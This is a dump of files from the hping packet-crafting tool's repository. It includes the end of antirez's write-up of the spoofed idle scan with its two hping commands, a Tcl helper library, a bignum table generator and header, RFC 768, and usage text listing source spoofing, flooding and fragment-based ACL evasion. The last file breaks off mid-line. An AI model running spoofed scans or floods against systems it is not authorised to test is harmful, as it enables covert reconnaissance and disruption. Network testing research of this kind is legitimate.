87 | Instead, if port X of C is closed sending to C a few 88 | of SYN spoofed from B, it will reply with RST to B, and 89 | B will not reply (see 3). So we'll see that host B is not sending 90 | any packet: 91 | 92 | . 93 | .. 94 | -cut- 95 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=52 ttl=64 id=+1 win=0 time=85 ms 96 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=53 ttl=64 id=+1 win=0 time=83 ms 97 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=54 ttl=64 id=+1 win=0 time=93 ms 98 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=55 ttl=64 id=+1 win=0 time=74 ms 99 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=56 ttl=64 id=+1 win=0 time=95 ms 100 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=57 ttl=64 id=+1 win=0 time=81 ms 101 | -cut- 102 | .. 103 | . 104 | 105 | The port is closed. 106 | 107 | All this can appear complicated to perform, but using two sessions 108 | of hping on Linux virtual consoles or under X makes it more simple. 109 | First session listen host B: hping B -r 110 | Second session send spoofed SYN: hping C -a B -S 111 | 112 | Sorry if my english is not so clear. 113 | However this posting is not adequate to describe exaustively 114 | this scan method, so i'll write a paper on this topic, specially 115 | about how to implement this in a port scanner (i.e. nmap), and 116 | about players characteristics and OS used. 117 | 118 | happy new year, 119 | antirez 120 | -------------------------------------------------------------------------------- /lib/hpingstdlib.htcl: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | # 3 | # Helper functions 4 | # This will be part of the hping standard library (possibly modified) 5 | # 6 | 7 | ################################################################################ 8 | # Functions related to network interface managment 9 | ################################################################################ 10 | 11 | # Return the name of the output interface for address addr 12 | proc outifname addr { 13 | set ifa [hping outifa $addr] 14 | set interfaces [hping iflist] 15 | foreach i $interfaces { 16 | foreach ia [lindex $i 2] { 17 | if {$ifa == $ia} { 18 | return [lindex $i 0] 19 | } 20 | } 21 | } 22 | error "Unable to find the output interface name for $addr" 23 | } 24 | 25 | ################################################################################ 26 | # Functions related to packets description 27 | ################################################################################ 28 | 29 | interp alias {} GetApdField {} hping getfield 30 | 31 | proc SetApdField {protocol field value pvar} { 32 | upvar $pvar p 33 | set p [hping setfield $protocol $field $value $p] 34 | } 35 | 36 | proc DelApdField {protocol field pvar} { 37 | upvar $pvar p 38 | set p [hping delfield $protocol $field $p] 39 | } 40 | 41 | interp alias {} GetIpSaddr {} hping getfield ip saddr 42 | interp alias {} GetIpDaddr {} hping getfield ip daddr 43 | interp alias {} GetIpTtl {} hping getfield ip ttl 44 | interp alias {} GetIpProto {} hping getfield ip proto 45 | interp alias {} GetTcpSport {} hping getfield tcp sport 46 | interp alias {} GetTcpDport {} hping getfield tcp dport 47 | interp alias {} GetTcpSeq {} hping getfield tcp seq 48 | interp alias {} GetTcpAck {} hping getfield tcp ack 49 | interp alias {} GetTcpTimestampVal {} hping getfield tcp.timestamp val 50 | interp alias {} GetTcpTimestampEcr {} hping getfield tcp.timestamp ecr 51 | interp alias {} GetIcmpType {} hping getfield icmp type 52 | interp alias {} GetIcmpCode {} hping getfield icmp code 53 | interp alias {} GetIcmpId {} hping getfield icmp id 54 | interp alias {} GetIcmpSeq {} hping getfield icmp seq 55 | interp alias {} GetDataHex {} hping getfield data hex 56 | 57 | # From APD to Tcl list 58 | proc apd2list apd { 59 | set list {} 60 | foreach layer [split $apd +] { 61 | set t [split $layer ()] 62 | set name [lindex $t 0] 63 | set fields [lindex $t 1] 64 | set l [list $name] 65 | foreach fieldvalue [split $fields ,] { 66 | foreach {field value} [split $fieldvalue =] break 67 | lappend l [list $field $value] 68 | } 69 | lappend list $l 70 | } 71 | return $list 72 | } 73 | 74 | # From Tcl list to APD 75 | proc list2apd list { 76 | if {![llength $list]} return 77 | foreach layer $list { 78 | append apd [lindex $layer 0] ( 79 | set layer [lrange $layer 1 end] 80 | foreach fieldvalue $layer { 81 | append apd [lindex $fieldvalue 0] = [lindex $fieldvalue 1] , 82 | } 83 | if {[llength $layer] != 0} { 84 | set apd [string range $apd 0 end-1] 85 | } 86 | append apd )+ 87 | } 88 | set apd [string range $apd 0 end-1] 89 | return $apd 90 | } 91 | 92 | ################################################################################ 93 | # High-level networking functions 94 | ################################################################################ 95 | 96 | # Return non-zero if the host addr seems awake. 97 | # This is done sending a TCP ACK packet and an ICMP echo request 98 | # and searching for at least a reply. 99 | proc isawake addr { 100 | set addr [hping resolve $addr] 101 | set ifname [outifname $addr] 102 | set ifaddr [hping outifa $addr] 103 | 104 | hping recv eth0 0 105 | 106 | set ip "ip(saddr=$ifaddr,daddr=$addr,ttl=64)" 107 | append ack $ip "+tcp(sport=11005,dport=11111,flags=a)" 108 | append icmp $ip "+icmp(type=8,code=8,id=11111)" 109 | 110 | hping send $ack 111 | hping send $icmp 112 | 113 | for {set i 0} {$i < 10} {incr i} { 114 | set packets [hping recv $ifname 100 0] 115 | foreach p $packets { 116 | if {([GetIpSaddr $p] == $addr) && (([GetIcmpId $p] == 11111) || ([GetTcpSport $p] == 11111))} { 117 | return 1; 118 | } 119 | } 120 | } 121 | return 0; 122 | } 123 | 124 | # Todo, check the OS's version and to what needed. 125 | proc DropOutgoingResets {} { 126 | exec "iptables -A OUTPUT -p tcp -j DROP --tcp-flags RST RST" 127 | } 128 | 129 | ################################################################################ 130 | # Non hping specific Tcl functions that seems to help 131 | ################################################################################ 132 | 133 | proc isempty l { 134 | expr {[llength $l] == 0} 135 | } 136 | 137 | proc haskey {arrayname key} { 138 | expr {[llength [uplevel "array names $arrayname -exact $key"]] != 0} 139 | } 140 | 141 | # 142 | # End of the hping standard library 143 | # 144 | ################################################################################ 145 | 146 | # vim: filetype=tcl 147 | -------------------------------------------------------------------------------- /gentables.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "sbignum.h" 6 | 7 | static char *cset = "0123456789abcdefghijklmnopqrstuvwxyz"; 8 | 9 | static void gen_cset(int hdr); 10 | static void gen_rcset(int hdr); 11 | static void gen_bitstable(int hdr); 12 | static void gen_basetable(int hdr); 13 | static void _gen_basetable(int bytes, double base); 14 | static void gen_basepowtable(int hdr); 15 | static void _gen_basepowtable(int bytes, double base); 16 | static unsigned long lexp(unsigned long b, int e); 17 | static int nbits(unsigned char x); 18 | static double logbn(double base, double n); 19 | 20 | #define EFL 16 /* elements for line */ 21 | 22 | int main(int argc, char **argv) 23 | { 24 | int hdr = argc-1; 25 | argv = argv; 26 | 27 | if (hdr) { 28 | printf( "#ifndef _SBN_TABLES_H\n" 29 | "#define _SBN_TABLES_H\n" 30 | "\n" 31 | "#include \n\n"); 32 | } else { 33 | printf( "#include \"tables.h\"\n" 34 | "#include \"sbignum.h\"\n\n"); 35 | } 36 | gen_cset(hdr); 37 | gen_rcset(hdr); 38 | gen_bitstable(hdr); 39 | gen_basetable(hdr); 40 | gen_basepowtable(hdr); 41 | if (hdr) { 42 | printf("\n#endif /* _SBN_TABLES_H */\n"); 43 | } 44 | return 0; 45 | } 46 | 47 | void gen_cset(int hdr) 48 | { 49 | if (hdr) { 50 | printf("extern char *cset;\n"); 51 | return; 52 | } 53 | printf("/* maps a number to a char */\n"); 54 | printf("char *cset = \"%s\";\n\n", cset); 55 | } 56 | 57 | void gen_rcset(int hdr) 58 | { 59 | int i; 60 | 61 | if (hdr) { 62 | printf("extern int8_t r_cset[256];\n"); 63 | return; 64 | } 65 | printf("/* maps a char to a number */\n"); 66 | printf("int8_t r_cset[256] = {\n"); 67 | for (i = 0; i < 256; i++) { 68 | char *p; 69 | p = strchr(cset, i); 70 | if (!(i%EFL)) 71 | printf("\t"); 72 | if (!p || !i) { 73 | printf("-1, "); 74 | } else { 75 | printf("%2d, ", p-cset); 76 | } 77 | if (!((i+1) % EFL)) 78 | printf("\n"); 79 | } 80 | printf("};\n\n"); 81 | } 82 | 83 | int nbits(unsigned char x) 84 | { 85 | int i = 8; 86 | int bits = 0; 87 | do { 88 | bits += x & 1; 89 | x >>= 1; 90 | } while(--i); 91 | return bits; 92 | } 93 | 94 | void gen_bitstable(int hdr) 95 | { 96 | int i; 97 | 98 | if (hdr) { 99 | printf("extern int8_t bitstable[256];\n"); 100 | return; 101 | } 102 | printf("/* bitstable[n] is the number of set bits\n" 103 | " * in the number 'n' */\n"); 104 | printf("int8_t bitstable[256] = {\n"); 105 | for (i = 0; i < 256; i++) { 106 | if (!(i%EFL)) 107 | printf("\t"); 108 | printf("%d, ", nbits(i)); 109 | if (!((i+1) % EFL)) 110 | printf("\n"); 111 | } 112 | printf("};\n\n"); 113 | } 114 | 115 | double logbn(double base, double n) 116 | { 117 | return log(n)/log(base); 118 | } 119 | 120 | void _gen_basetable(int bytes, double base) 121 | { 122 | int i; 123 | 124 | printf("#if ATOMBYTES == %d\n", bytes); 125 | printf("double basetable[%d] = {\n", SBN_MAXBASE+1); 126 | for (i = 0; i <= SBN_MAXBASE; i++) { 127 | if (i < 2) { 128 | printf("\t0, /* unused */\n"); 129 | continue; 130 | } 131 | printf("\t%f, /* (log of %d in base %.0f) */\n", 132 | logbn(i, base), i, base); 133 | } 134 | printf("};\n#endif\n\n"); 135 | } 136 | 137 | #define BT_8BITBASE 256U 138 | #define BT_16BITBASE 65536U 139 | #define BT_32BITBASE 4294967296U 140 | 141 | void gen_basetable(int hdr) 142 | { 143 | if (hdr) { 144 | printf("extern double basetable[%d];\n", SBN_MAXBASE+1); 145 | return; 146 | } 147 | printf("/* basetable[b] = number of digits needed to convert\n" 148 | " * an mpz atom in base 'b' */\n"); 149 | _gen_basetable(1, BT_8BITBASE); 150 | _gen_basetable(2, BT_16BITBASE); 151 | _gen_basetable(4, BT_32BITBASE); 152 | } 153 | 154 | /* return b^e */ 155 | unsigned long lexp(unsigned long b, int e) 156 | { 157 | unsigned long p = b; 158 | if (!e) return 1; 159 | while(--e) 160 | p *= b; 161 | return p; 162 | } 163 | 164 | void _gen_basepowtable(int bytes, double base) 165 | { 166 | int i; 167 | 168 | base--; 169 | printf("#if ATOMBYTES == %d\n", bytes); 170 | printf("struct sbn_basepow basepowtable[%d] = {\n", SBN_MAXBASE+1); 171 | for (i = 0; i <= SBN_MAXBASE; i++) { 172 | unsigned long bexp; 173 | unsigned long bpow; 174 | if (i < 2) { 175 | printf("\t{0,0}, /* unused */\n"); 176 | continue; 177 | } 178 | bexp = (unsigned long) floor(logbn(i, base)); 179 | bpow = lexp(i, bexp); 180 | printf("\t{%luU, %luU}, /* floor(log of %d in base %.0f) */\n", 181 | bpow, bexp, i, base); 182 | } 183 | printf("};\n#endif\n\n"); 184 | } 185 | 186 | void gen_basepowtable(int hdr) 187 | { 188 | if (hdr) { 189 | printf( "struct sbn_basepow {\n" 190 | " unsigned long maxpow;\n" 191 | " unsigned long maxexp;\n" 192 | "};\n"); 193 | printf("extern struct sbn_basepow basepowtable[%d];\n", 194 | SBN_MAXBASE+1); 195 | return; 196 | } 197 | printf( 198 | "/* basepowtable[b] = the first column is the biggest power of 'b'\n" 199 | " * that fits in mpz_atom_t, the second column is the exponent\n" 200 | " * 'e' so that b^e = the value of the first column */\n"); 201 | _gen_basepowtable(1, BT_8BITBASE); 202 | _gen_basepowtable(2, BT_16BITBASE); 203 | _gen_basepowtable(4, BT_32BITBASE); 204 | } 205 | -------------------------------------------------------------------------------- /sbignum.h: -------------------------------------------------------------------------------- 1 | /* Sbignum.h -- antirez's arbitrary precision integer math library header file. 2 | * Copyright(C) 2002-2003 Salvatore Sanfilippo. 3 | * All rights reserved. 4 | * 5 | * $Id: sbignum.h,v 1.4 2004/06/04 07:22:38 antirez Exp $ 6 | */ 7 | 8 | #ifndef _SBIGNUM_H 9 | #define _SBIGNUM_H 10 | 11 | #include 12 | #include "fixtypes.h" 13 | 14 | #define ATOMBYTES 4 15 | 16 | /* The number internal rappresentation is an array of mpz_atom_t WORDS. 17 | * Every byte is a digit in base MPZ_AND+1, the first word is the least 18 | * significant word and so on */ 19 | #if ATOMBYTES == 4 20 | typedef u_int32_t mpz_atom_t; 21 | typedef u_int64_t mpz_carry_t; 22 | typedef int64_t mpz_scarry_t; 23 | #elif ATOMBYTES == 2 24 | typedef u_int16_t mpz_atom_t; 25 | typedef u_int32_t mpz_carry_t; 26 | typedef int32_t mpz_scarry_t; 27 | #elif ATOMBYTES == 1 28 | typedef u_int8_t mpz_atom_t; 29 | typedef u_int32_t mpz_carry_t; 30 | typedef int32_t mpz_scarry_t; 31 | #else 32 | #error "Please define ATOMBYTES" 33 | #endif 34 | 35 | #define ATOMBITS (ATOMBYTES*8) 36 | 37 | #define MPZ_ATOMSZ (sizeof(mpz_atom_t)) 38 | #define MPZ_MASK ((mpz_atom_t)(~0)) 39 | #define MPZ_SHIFT (MPZ_ATOMSZ*8) 40 | #define MPZ_BASE ((mpz_carry_t)MPZ_MASK+1) 41 | 42 | struct struct_sbnz { 43 | mpz_atom_t *d; /* data the least significant word is d[0] */ 44 | u_int32_t a; /* allocated bytes */ 45 | u_int32_t l; /* number of used bytes */ 46 | u_int32_t s; /* sign. non-zero if negative */ 47 | }; 48 | /* define the sbnz type */ 49 | typedef struct struct_sbnz *mpz_ptr; 50 | typedef struct struct_sbnz mpz_t[1]; 51 | 52 | /* Error codes */ 53 | enum sbn_err { 54 | SBN_OK = 0, 55 | SBN_MEM, 56 | SBN_INVAL 57 | }; 58 | 59 | #define SBN_MINBASE 2 60 | #define SBN_MAXBASE 36 61 | 62 | /* Exported macros */ 63 | 64 | /* this macro is true if z == 0 */ 65 | #define _mpz_iszero(z) ((z)->l == 0) 66 | 67 | /* this is just the reverse. Equivalent to !_mpz_iszero */ 68 | #define _mpz_nonzero(z) ((z)->l != 0) 69 | 70 | #define mpz_inc(z) mpz_add_ui(z, z, 1) 71 | #define mpz_dec(z) mpz_sub_ui(z, z, 1) 72 | 73 | /* ----------------------- Functions prototypes ----------------------------- */ 74 | 75 | /* inititialization/allocation */ 76 | void mpz_init(mpz_ptr z); 77 | void mpz_clear(mpz_ptr z); 78 | int mpz_realloc(mpz_ptr z, u_int32_t i); 79 | /* shifting */ 80 | int mpz_lshift(mpz_ptr r, mpz_ptr z, u_int32_t i); 81 | int mpz_rshift(mpz_ptr r, mpz_ptr z, u_int32_t i); 82 | /* comparision */ 83 | int32_t mpz_abscmp(mpz_ptr a, mpz_ptr b); 84 | int32_t mpz_abscmp_ui(mpz_ptr a, u_int32_t u); 85 | int32_t mpz_cmp(mpz_ptr a, mpz_ptr b); 86 | #define mpz_eq(a,b) (mpz_cmp(a,b) == 0) 87 | #define mpz_noteq(a,b) (mpz_cmp(a,b) != 0) 88 | #define mpz_lt(a,b) (mpz_cmp(a,b) < 0) 89 | #define mpz_le(a,b) (mpz_cmp(a,b) <= 0) 90 | #define mpz_gt(a,b) (mpz_cmp(a,b) > 0) 91 | #define mpz_ge(a,b) (mpz_cmp(a,b) >= 0) 92 | int32_t mpz_cmp_ui(mpz_ptr a, u_int32_t u); 93 | int32_t mpz_cmp_si(mpz_ptr a, int32_t s); 94 | #define mpz_eq_si(a,s) (mpz_cmp_si(a,s) == 0) 95 | #define mpz_noteq_si(a,s) (mpz_cmp_si(a,s) != 0) 96 | #define mpz_lt_si(a,s) (mpz_cmp_si(a,s) < 0) 97 | #define mpz_le_si(a,s) (mpz_cmp_si(a,s) <= 0) 98 | #define mpz_gt_si(a,s) (mpz_cmp_si(a,s) > 0) 99 | #define mpz_ge_si(a,s) (mpz_cmp_si(a,s) >= 0) 100 | /* addition */ 101 | int mpz_add_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 102 | int mpz_add_si(mpz_ptr r, mpz_ptr z, int32_t s); 103 | int mpz_add(mpz_ptr r, mpz_ptr a, mpz_ptr b); 104 | /* subtraction */ 105 | int mpz_sub_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 106 | int mpz_sub_si(mpz_ptr r, mpz_ptr z, int32_t s); 107 | int mpz_sub(mpz_ptr r, mpz_ptr a, mpz_ptr b); 108 | /* multiplication */ 109 | int mpz_mul(mpz_ptr r, mpz_ptr z, mpz_ptr f); 110 | int mpz_mul_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 111 | int mpz_mul_si(mpz_ptr r, mpz_ptr z, int32_t s); 112 | int mpz_fac_ui(mpz_ptr r, u_int32_t i); 113 | /* exponentialization */ 114 | int mpz_powm(mpz_ptr r, mpz_ptr b, mpz_ptr e, mpz_ptr m); 115 | int mpz_pow(mpz_ptr r, mpz_ptr b, mpz_ptr e); 116 | /* division */ 117 | int mpz_tdiv_qr(mpz_ptr q, mpz_ptr r, mpz_ptr z, mpz_ptr d); 118 | int mpz_tdiv_qr_ui(mpz_ptr q, mpz_ptr r, mpz_ptr z, u_int32_t u); 119 | int mpz_tdiv_qr_si(mpz_ptr q, mpz_ptr r, mpz_ptr z, int32_t s); 120 | int mpz_tdiv_q(mpz_ptr q, mpz_ptr z, mpz_ptr d); 121 | int mpz_tdiv_q_ui(mpz_ptr q, mpz_ptr z, u_int32_t u); 122 | int mpz_tdiv_q_si(mpz_ptr q, mpz_ptr z, int32_t s); 123 | int mpz_tdiv_r(mpz_ptr r, mpz_ptr z, mpz_ptr d); 124 | int mpz_tdiv_r_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 125 | int mpz_tdiv_r_si(mpz_ptr r, mpz_ptr z, int32_t s); 126 | int mpz_mod(mpz_ptr r, mpz_ptr z, mpz_ptr m); 127 | /* root extraction */ 128 | int mpz_sqrt(mpz_ptr r, mpz_ptr z); 129 | /* assignment */ 130 | int mpz_setzero(mpz_ptr z); 131 | int mpz_set(mpz_ptr d, mpz_ptr s); 132 | int mpz_set_ui(mpz_ptr z, u_int32_t u); 133 | int mpz_set_si(mpz_ptr z, int32_t s); 134 | int mpz_abs(mpz_ptr d, mpz_ptr s); 135 | int mpz_neg(mpz_ptr d, mpz_ptr s); 136 | /* bit operations */ 137 | u_int32_t mpz_bits(mpz_ptr z); 138 | int mpz_setbit(mpz_ptr z, u_int32_t i); 139 | int mpz_clrbit(mpz_ptr z, u_int32_t i); 140 | int mpz_testbit(mpz_ptr z, u_int32_t i); 141 | /* number theoretic functions */ 142 | int mpz_gcd(mpz_ptr g, mpz_ptr a, mpz_ptr b); 143 | u_int32_t mpz_gcd_ui(mpz_ptr g, mpz_ptr a, u_int32_t b); 144 | /* to/from mpz conversions */ 145 | size_t mpz_sizeinbase(mpz_ptr z, u_int32_t b); 146 | char *mpz_get_str(char *str, int b, mpz_ptr z); 147 | int mpz_set_str(mpz_ptr z, char *s, int b); 148 | double mpz_get_d(mpz_ptr z); 149 | int mpz_set_d(mpz_ptr z, double d); 150 | int mpz_set_si64(mpz_ptr z, int64_t s); 151 | int mpz_set_ui64(mpz_ptr z, u_int64_t u); 152 | /* random numbers */ 153 | u_int32_t sbn_rand(void); 154 | void sbn_seed(void *seed, size_t len); 155 | int mpz_random(mpz_ptr z, int32_t len); 156 | 157 | #endif /* _SBIGNUM_H */ 158 | -------------------------------------------------------------------------------- /RFCs/rfc768.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | RFC 768 J. Postel 4 | ISI 5 | 28 August 1980 6 | 7 | 8 | 9 | User Datagram Protocol 10 | ---------------------- 11 | 12 | Introduction 13 | ------------ 14 | 15 | This User Datagram Protocol (UDP) is defined to make available a 16 | datagram mode of packet-switched computer communication in the 17 | environment of an interconnected set of computer networks. This 18 | protocol assumes that the Internet Protocol (IP) [1] is used as the 19 | underlying protocol. 20 | 21 | This protocol provides a procedure for application programs to send 22 | messages to other programs with a minimum of protocol mechanism. The 23 | protocol is transaction oriented, and delivery and duplicate protection 24 | are not guaranteed. Applications requiring ordered reliable delivery of 25 | streams of data should use the Transmission Control Protocol (TCP) [2]. 26 | 27 | Format 28 | ------ 29 | 30 | 31 | 0 7 8 15 16 23 24 31 32 | +--------+--------+--------+--------+ 33 | | Source | Destination | 34 | | Port | Port | 35 | +--------+--------+--------+--------+ 36 | | | | 37 | | Length | Checksum | 38 | +--------+--------+--------+--------+ 39 | | 40 | | data octets ... 41 | +---------------- ... 42 | 43 | User Datagram Header Format 44 | 45 | Fields 46 | ------ 47 | 48 | Source Port is an optional field, when meaningful, it indicates the port 49 | of the sending process, and may be assumed to be the port to which a 50 | reply should be addressed in the absence of any other information. If 51 | not used, a value of zero is inserted. 52 | 53 | 54 | 55 | 56 | 57 | Postel [page 1] 58 | 59 | 60 | 28 Aug 1980 61 | User Datagram Protocol RFC 768 62 | Fields 63 | 64 | 65 | 66 | Destination Port has a meaning within the context of a particular 67 | internet destination address. 68 | 69 | Length is the length in octets of this user datagram including this 70 | header and the data. (This means the minimum value of the length is 71 | eight.) 72 | 73 | Checksum is the 16-bit one's complement of the one's complement sum of a 74 | pseudo header of information from the IP header, the UDP header, and the 75 | data, padded with zero octets at the end (if necessary) to make a 76 | multiple of two octets. 77 | 78 | The pseudo header conceptually prefixed to the UDP header contains the 79 | source address, the destination address, the protocol, and the UDP 80 | length. This information gives protection against misrouted datagrams. 81 | This checksum procedure is the same as is used in TCP. 82 | 83 | 0 7 8 15 16 23 24 31 84 | +--------+--------+--------+--------+ 85 | | source address | 86 | +--------+--------+--------+--------+ 87 | | destination address | 88 | +--------+--------+--------+--------+ 89 | | zero |protocol| UDP length | 90 | +--------+--------+--------+--------+ 91 | 92 | If the computed checksum is zero, it is transmitted as all ones (the 93 | equivalent in one's complement arithmetic). An all zero transmitted 94 | checksum value means that the transmitter generated no checksum (for 95 | debugging or for higher level protocols that don't care). 96 | 97 | User Interface 98 | -------------- 99 | 100 | A user interface should allow 101 | 102 | the creation of new receive ports, 103 | 104 | receive operations on the receive ports that return the data octets 105 | and an indication of source port and source address, 106 | 107 | and an operation that allows a datagram to be sent, specifying the 108 | data, source and destination ports and addresses to be sent. 109 | 110 | 111 | 112 | 113 | 114 | 115 | [page 2] Postel 116 | 117 | 118 | 28 Aug 1980 119 | RFC 768 User Datagram Protocol 120 | IP Interface 121 | 122 | 123 | 124 | IP Interface 125 | ------------- 126 | 127 | The UDP module must be able to determine the source and destination 128 | internet addresses and the protocol field from the internet header. One 129 | possible UDP/IP interface would return the whole internet datagram 130 | including all of the internet header in response to a receive operation. 131 | Such an interface would also allow the UDP to pass a full internet 132 | datagram complete with header to the IP to send. The IP would verify 133 | certain fields for consistency and compute the internet header checksum. 134 | 135 | Protocol Application 136 | -------------------- 137 | 138 | The major uses of this protocol is the Internet Name Server [3], and the 139 | Trivial File Transfer [4]. 140 | 141 | Protocol Number 142 | --------------- 143 | 144 | This is protocol 17 (21 octal) when used in the Internet Protocol. 145 | Other protocol numbers are listed in [5]. 146 | 147 | References 148 | ---------- 149 | 150 | [1] Postel, J., "Internet Protocol," RFC 760, USC/Information 151 | Sciences Institute, January 1980. 152 | 153 | [2] Postel, J., "Transmission Control Protocol," RFC 761, 154 | USC/Information Sciences Institute, January 1980. 155 | 156 | [3] Postel, J., "Internet Name Server," USC/Information Sciences 157 | Institute, IEN 116, August 1979. 158 | 159 | [4] Sollins, K., "The TFTP Protocol," Massachusetts Institute of 160 | Technology, IEN 133, January 1980. 161 | 162 | [5] Postel, J., "Assigned Numbers," USC/Information Sciences 163 | Institute, RFC 762, January 1980. 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | Postel [page 3] 174 | -------------------------------------------------------------------------------- /usage.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: usage.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:50 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: usage.c,v 1.2 2004/06/18 09:53:11 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | void show_usage(void) 17 | { 18 | printf( 19 | "usage: hping host [options]\n" 20 | " -h --help show this help\n" 21 | " -v --version show version\n" 22 | " -c --count packet count\n" 23 | " -i --interval wait (uX for X microseconds, for example -i u1000)\n" 24 | " --fast alias for -i u10000 (10 packets for second)\n" 25 | " --faster alias for -i u1000 (100 packets for second)\n" 26 | " --flood sent packets as fast as possible. Don't show replies.\n" 27 | " -n --numeric numeric output\n" 28 | " -q --quiet quiet\n" 29 | " -I --interface interface name (otherwise default routing interface)\n" 30 | " -V --verbose verbose mode\n" 31 | " -D --debug debugging info\n" 32 | " -z --bind bind ctrl+z to ttl (default to dst port)\n" 33 | " -Z --unbind unbind ctrl+z\n" 34 | " --beep beep for every matching packet received\n" 35 | "Mode\n" 36 | " default mode TCP\n" 37 | " -0 --rawip RAW IP mode\n" 38 | " -1 --icmp ICMP mode\n" 39 | " -2 --udp UDP mode\n" 40 | " -8 --scan SCAN mode.\n" 41 | " Example: hping --scan 1-30,70-90 -S www.target.host\n" 42 | " -9 --listen listen mode\n" 43 | "IP\n" 44 | " -a --spoof spoof source address\n" 45 | " --rand-dest random destionation address mode. see the man.\n" 46 | " --rand-source random source address mode. see the man.\n" 47 | " -t --ttl ttl (default 64)\n" 48 | " -N --id id (default random)\n" 49 | " -W --winid use win* id byte ordering\n" 50 | " -r --rel relativize id field (to estimate host traffic)\n" 51 | " -f --frag split packets in more frag. (may pass weak acl)\n" 52 | " -x --morefrag set more fragments flag\n" 53 | " -y --dontfrag set dont fragment flag\n" 54 | " -g --fragoff set the fragment offset\n" 55 | " -m --mtu set virtual mtu, implies --frag if packet size > mtu\n" 56 | " -o --tos type of service (default 0x00), try --tos help\n" 57 | " -G --rroute includes RECORD_ROUTE option and display the route buffer\n" 58 | " --lsrr loose source routing and record route\n" 59 | " --ssrr strict source routing and record route\n" 60 | " -H --ipproto set the IP protocol field, only in RAW IP mode\n" 61 | "ICMP\n" 62 | " -C --icmptype icmp type (default echo request)\n" 63 | " -K --icmpcode icmp code (default 0)\n" 64 | " --force-icmp send all icmp types (default send only supported types)\n" 65 | " --icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)\n" 66 | " --icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)\n" 67 | " --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)\n" 68 | " --icmp-help display help for others icmp options\n" 69 | "UDP/TCP\n" 70 | " -s --baseport base source port (default random)\n" 71 | " -p --destport [+][+] destination port(default 0) ctrl+z inc/dec\n" 72 | " -k --keep keep still source port\n" 73 | " -w --win winsize (default 64)\n" 74 | " -O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)\n" 75 | " -Q --seqnum shows only tcp sequence number\n" 76 | " -b --badcksum (try to) send packets with a bad IP checksum\n" 77 | " many systems will fix the IP checksum sending the packet\n" 78 | " so you'll get bad UDP/TCP checksum instead.\n" 79 | " -M --setseq set TCP sequence number\n" 80 | " -L --setack set TCP ack\n" 81 | " -F --fin set FIN flag\n" 82 | " -S --syn set SYN flag\n" 83 | " -R --rst set RST flag\n" 84 | " -P --push set PUSH flag\n" 85 | " -A --ack set ACK flag\n" 86 | " -U --urg set URG flag\n" 87 | " -X --xmas set X unused flag (0x40)\n" 88 | " -Y --ymas set Y unused flag (0x80)\n" 89 | " --tcpexitcode use last tcp->th_flags as exit code\n" 90 | " --tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime\n" 91 | "Clock skew detection\n" 92 | " --clock-skew enable clock skew detection. Try with -S against open port\n" 93 | " --clock-skew-win window of time (in seconds) for CS detection. Default 300\n" 94 | " --clock-skew-shift timestamp samples to use for error correction. Default 5\n" 95 | " --clock-skew-packets-per-sample # of packets to extract a sample. Default 10\n" 96 | "Common\n" 97 | " -d --data data size (default is 0)\n" 98 | " -E --file data from file\n" 99 | " -e --sign add 'signature'\n" 100 | " -j --dump dump packets in hex\n" 101 | " -J --print dump printable characters\n" 102 | " -B --safe enable 'safe' protocol\n" 103 | " -u --end tell you when --file reached EOF and prevent rewind\n" 104 | " -T --traceroute traceroute mode (implies --bind and --ttl 1)\n" 105 | " --tr-stop Exit when receive the first not ICMP in traceroute mode\n" 106 | " --tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop\n" 107 | " --tr-no-rtt Don't calculate/show RTT information in traceroute mode\n" 108 | "ARS packet description (new, unstable)\n" 109 | " --apd-send Send the packet described with APD (see docs/APD.txt)\n" 110 | ); 111 | exit(0); 112 | }; 113 | 114 | void tos_help(void) 115 | { 116 | printf( 117 | "tos help:\n" 118 | " TOS Name Hex Value Typical Uses\n" 119 | "\n" 120 | " Minimum Delay 10 ftp, telnet\n" 121 | " Maximum Throughput 08 ftp-data\n" 122 | " Maximum Reliability 04 snmp\n" 123 | " Minimum Cost 02 nntp\n" 124 | ); 125 | exit(0); 126 | } 127 | 128 | void icmp_help(void) 129 | { 130 | printf( 131 | "ICMP help:\n" 132 | " ICMP concerned packet options:\n" 133 | " --icmp-ipver set ip version ( default 4 )\n" 134 | " --icmp-iphlen set ip header lenght ( default IPHDR_SIZE >> 2)\n" 135 | " --icmp-iplen set ip total lengtht ( default real lenght )\n" 136 | " --icmp-ipid set ip id ( default random )\n" 137 | " --icmp-ipproto set ip protocol ( default IPPROTO_TCP )\n" 138 | " --icmp-ipsrc set ip source ( default 0.0.0.0 )\n" 139 | " --icmp-ipdst set ip destination ( default 0.0.0.0 )\n" 140 | " --icmp-srcport set tcp/udp source port ( default random )\n" 141 | " --icmp-dstport set tcp/udp destination port ( default random )\n" 142 | " --icmp-cksum set icmp checksum ( default the right cksum)\n" 143 | ); 144 | exit(0); 145 | } 146 | 147 | void route_help(void) 148 | { 149 | printf( 150 | "route help:\n" 151 | " A route has the following format: [ptr:]IP1[/IP2[/IP3...]]\n" 152 | " where ptr is the exact value of the pointer that will be used for the 